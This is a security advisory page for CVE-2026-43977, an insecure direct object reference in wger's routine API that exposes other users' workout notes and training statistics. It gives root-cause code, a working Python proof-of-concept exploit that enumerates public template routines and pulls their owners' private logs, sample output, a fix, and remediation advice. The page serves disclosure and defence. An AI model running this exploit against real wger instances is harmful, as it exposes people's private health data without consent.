Skip to main content

wger CVE-2026-43977

HIGH
Information Exposure (CWE-200)
2026-05-14 https://github.com/wger-project/wger GHSA-cj9g-27ph-4cgv
7.5
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.5 HIGH
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
May 14, 2026 - 17:01 vuln.today
Analysis Generated
May 14, 2026 - 17:01 vuln.today
CVE Published
May 14, 2026 - 16:16 nvd
HIGH 7.5

DescriptionGitHub Advisory

Summary

Any authenticated user can read another user's private workout session notes, exercise history, and training statistics by calling the /logs/ and /stats/ actions on a routine they do not own.

The RoutinePermission class grants read access to any authenticated user when a routine has is_template=True, regardless of ownership. The /logs/ and /stats/ API actions use the same permission check but return the routine owner's personal training data instead of the requesting user's data, creating an insecure direct object reference (IDOR).

An attacker with a free account can enumerate all public template routine IDs via GET /api/v2/routine/?is_template=true, then call GET /api/v2/routine/{id}/logs/ and GET /api/v2/routine/{id}/stats/ to access the owner's private health data including workout notes, weights, repetitions, and performance statistics.

Description

wger exposes a REST API endpoint that allows any authenticated user to retrieve the private workout session notes, exercise logs, and training statistics belonging to another user, as long as that user has at least one routine marked as a public template.

The vulnerability exists in RoutineViewSet (wger/manager/api/views.py). The view defines two custom actions /logs/ and /stats/ that are intended to return data for the requesting user's own training history within a routine. However, the underlying permission check (RoutinePermission.has_object_permission) grants read access to any authenticated user when the routine has is_template=True, regardless of ownership. When the /logs/ or /stats/ actions are invoked against a routine the attacker does not own, they return the owner's private workout history, not the attacker's.

Root Cause

File: wger/manager/api/permissions.py, lines 30-41

python
def has_object_permission(self, request, view, obj):
    if obj.user == request.user:
        return True

    if obj.is_template:
# ← any template is readable
        return request.method in permissions.SAFE_METHODS
# by any authenticated user

    return False

File: wger/manager/api/views.py, lines 173-199

python
@action(detail=True, url_path='logs')
def logs(self, request, pk):
    out = LogDisplaySerializer(
        self.get_object().logs_display(),
# ← returns OWNER's logs, not request.user's
        many=True,
    ).data
    return Response(out)

@action(detail=True, url_path='stats')
def stats(self, request, pk):
    out = LogStatsDataSerializer(
        self.get_object().calculate_log_statistics()
# ← owner's statistics
    ).data
    return Response(out)

self.get_object() retrieves the routine belonging to the owner (e.g., user A). Since is_template=True passes the permission check for any authenticated user, the attacker's request reaches logs_display() and calculate_log_statistics(), which return the owner's workout history, not the attacker's.

The intended behavior is that templates are public workout *plans* (exercise structure, sets, reps), but the /logs/ and /stats/ actions expose the *owner's personal training history* logged against that plan.

Impact

An authenticated attacker can:

  1. Enumerate all public template routines across all users:

GET /api/v2/routine/?is_template=true&is_public=true

  1. Read private workout session notes (freeform text entered by the victim after each workout session)
  2. Read full workout history including exercise names, weights, repetitions, and dates
  3. Read training statistics including volume, intensity, and set counts per muscle group and mesocycle

This data is health-related and personal. Under GDPR and similar regulations, unauthorized access to personal health data constitutes a data breach.

Proof of Concept

Scenario

There are two users in the system:

  • alice : a regular wger user who has been using the platform for months. She created a routine called "My 5/3/1 Program" and marked it as a public template so others can copy her exercise structure. She logs all her workouts with personal notes after each session.
  • bob : a second registered user who has never interacted with alice's account.

The attack:

Bob calls the routine listing endpoint to find all public templates. He gets back alice's routine ID. He then calls /api/v2/routine/{id}/logs/ an endpoint that should only show his own logs but instead receives alice's full workout history, including all her session notes ("Felt strong today, PR on squat"), weights, and performance data.

Bob does not need to know alice's username. He only needs her routine ID, which is a sequential integer discoverable by iterating ?is_template=true.

Step-by-step
  1. Bob registers a free account on the wger instance and obtains a JWT access token via POST /api/v2/token.
  2. Bob calls GET /api/v2/routine/?is_template=true&is_public=true this lists all public template routines from all users across the platform, including their IDs.
  3. For each routine ID returned, Bob calls GET /api/v2/routine/{id}/logs/ this returns the routine owner's workout sessions, including freeform personal notes and all logged exercises with weights and reps.
  4. Bob calls GET /api/v2/routine/{id}/stats/ to get aggregated statistics (total volume, intensity by muscle group, weekly progression) for the routine's owner.

No special permissions are needed. A fresh account (1-minute-old) can exploit this.

Python PoC
python
#!/usr/bin/env python3
"""
PoC: IDOR - Workout Session Data Exposure via Template Routine API
Affected: wger <= 2.5.0a2
Target:   GET /api/v2/routine/{id}/logs/
          GET /api/v2/routine/{id}/stats/
"""

import requests
import json

BASE_URL = "http://TARGET_IP"
# replace with target


def get_token(username, password):
    r = requests.post(
        f"{BASE_URL}/api/v2/token",
        json={"username": username, "password": password},
    )
    r.raise_for_status()
    return r.json()["access"]


def exploit(attacker_token):
    headers = {"Authorization": f"Bearer {attacker_token}"}
# Step 1: Enumerate all public template routines (from ALL users)
    print("[*] Step 1: Enumerating public template routines...")
    r = requests.get(
        f"{BASE_URL}/api/v2/routine/",
        params={"is_template": "true", "is_public": "true"},
        headers=headers,
    )
    routines = r.json().get("results", [])
    print(f"[+] Found {len(routines)} public template routine(s)\n")

    for routine in routines:
        routine_id = routine["id"]
        routine_name = routine["name"]
        print(f"[*] Targeting routine #{routine_id}: '{routine_name}'")
# Step 2: Fetch the OWNER's workout session logs (IDOR)
        logs_r = requests.get(
            f"{BASE_URL}/api/v2/routine/{routine_id}/logs/",
            headers=headers,
        )

        if logs_r.status_code == 200:
            sessions = logs_r.json()
            print(f"[+] VULNERABLE! Got {len(sessions)} session(s):")
            for session in sessions:
                s = session.get("session", {})
                print(f"    Date:       {s.get('date')}")
                print(f"    Notes:      {s.get('notes')}")
# ← private user notes
                print(f"    Impression: {s.get('impression')}")
                print(f"    Logs:       {len(session.get('logs', []))} exercise entries")
                print()
# Step 3: Fetch the OWNER's training statistics (IDOR)
        stats_r = requests.get(
            f"{BASE_URL}/api/v2/routine/{routine_id}/stats/",
            headers=headers,
        )

        if stats_r.status_code == 200:
            stats = stats_r.json()
            print(f"[+] Training statistics for routine #{routine_id}:")
            volume = stats.get("volume", {}).get("mesocycle", {})
            print(f"    Total volume:      {volume.get('total')} kg")
            print(f"    Upper body volume: {volume.get('upper_body')} kg")
            print(f"    Lower body volume: {volume.get('lower_body')} kg")
            print()

        print("-" * 60)


if __name__ == "__main__":
# Attacker uses their OWN credentials (no privilege needed)
    print("[*] Authenticating as attacker (bob)...")
    token = get_token("bob", "bobpassword")
    print(f"[+] Token acquired\n")

    exploit(token)
Expected output
[*] Authenticating as attacker (bob)...
[+] Token acquired

[*] Step 1: Enumerating public template routines...
[+] Found 1 public template routine(s)

[*] Targeting routine #1: 'Admin Secret Routine'
[+] VULNERABLE! Got 1 session(s):
    Date:       2024-06-15
    Notes:      SECRET workout note      ← alice's private note
    Impression: 3
    Logs:       0 exercise entries

[+] Training statistics for routine #1:
    Total volume:      0.00 kg
    Upper body volume: 0.00 kg
    Lower body volume: 0.00 kg

<img width="671" height="594" alt="image" src="https://github.com/user-attachments/assets/473cfd87-a63a-452d-a4f3-1aad23c4be24" />

Recommended Fix

The /logs/ and /stats/ actions must filter results to the requesting user, not the routine owner.

python
# wger/manager/api/views.py

@action(detail=True, url_path='logs')
def logs(self, request, pk):
    routine = self.get_object()
# Only return logs for the requesting user, regardless of routine ownership
    out = LogDisplaySerializer(
        routine.logs_display(user=request.user),
        many=True,
    ).data
    return Response(out)

@action(detail=True, url_path='stats')
def stats(self, request, pk):
    routine = self.get_object()
    out = LogStatsDataSerializer(
        routine.calculate_log_statistics(user=request.user)
    ).data
    return Response(out)

Additionally, RoutinePermission.has_object_permission should explicitly deny access to the /logs/ and /stats/ actions for non-owners, regardless of is_template:

python
def has_object_permission(self, request, view, obj):
    if obj.user == request.user:
        return True
# Template routines are readable, but only their structure
# never their owner's personal training history
    if obj.is_template and view.action not in ('logs', 'stats'):
        return request.method in permissions.SAFE_METHODS

    return False

AnalysisAI

Insecure Direct Object Reference in wger fitness platform exposes any authenticated user's complete workout history, session notes, and training statistics through template routine API endpoints. Attackers with free accounts enumerate public template routine IDs and retrieve owners' private health data including workout notes, weights, repetitions, and performance metrics via /api/v2/routine/{id}/logs/ and /api/v2/routine/{id}/stats/ endpoints. Detailed proof-of-concept with Python exploit confirms trivial exploitation against wger <= 2.5.0a2. CVSS 7.5 rates this High severity, but NOTE: vector PR:N appears inconsistent with authenticated-only access described - attackers need valid credentials, suggesting actual vector should be PR:L. EPSS data not available. No CVE KEV listing or public exploit repositories identified beyond GitHub advisory disclosure. Patch status unconfirmed - GitHub advisory references fix commit but no released version number provided in available data.

Technical ContextAI

wger is an open-source fitness and workout management platform written in Python using Django REST Framework. The vulnerability affects the RoutineViewSet API implementation where custom actions /logs/ and /stats/ expose private user data through flawed permission logic. The RoutinePermission class (wger/manager/api/permissions.py) grants read access to any routine marked is_template=True regardless of ownership, treating public templates as fully readable resources. However, the /logs/ and /stats/ actions call self.get_object().logs_display() and calculate_log_statistics(), which return the routine owner's workout session data rather than filtering by request.user. This creates a classic IDOR (CWE-200: Exposure of Sensitive Information to an Unauthorized Actor) where authenticated attackers access arbitrary users' health records by manipulating routine IDs. The affected CPE pkg:pip/wger indicates Python package distribution. Sequential integer routine IDs enable complete enumeration. The flaw violates Django's object-level permission model by conflating resource structure (template workout plan) with personal data (individual training history logged against that plan).

RemediationAI

No vendor-released patched version number confirmed at time of analysis - GitHub advisory references a fix commit but does not specify a release version (see advisory GHSA-cj9g-27ph-4cgv at https://github.com/wger-project/wger/security/advisories/GHSA-cj9g-27ph-4cgv). Immediate actions: (1) Apply the recommended code changes from advisory to wger/manager/api/views.py: modify logs() and stats() methods to filter results by request.user instead of routine owner, passing user=request.user to logs_display() and calculate_log_statistics(). (2) Update wger/manager/api/permissions.py RoutinePermission.has_object_permission to explicitly deny /logs/ and /stats/ actions for non-owners regardless of is_template flag. (3) Test that public template routines remain accessible for structure/plan copying while personal training history remains isolated. Compensating controls if patching is delayed: Disable public template functionality by setting is_template=False for all routines (TRADE-OFF: breaks legitimate template sharing feature, impacts user experience). Alternatively, implement API gateway rate limiting on /api/v2/routine/*/logs/ and /api/v2/routine/*/stats/ endpoints and monitor for enumeration patterns (concurrent requests across sequential routine IDs from single user). Restrict new user registration if operating private instance. Under GDPR Article 33, EU-deployed instances must notify supervisory authority within 72 hours if exploitation occurred. Audit access logs for GET requests to /logs/ and /stats/ endpoints where requester user_id != routine owner user_id to identify potential data exfiltration.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-43977 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy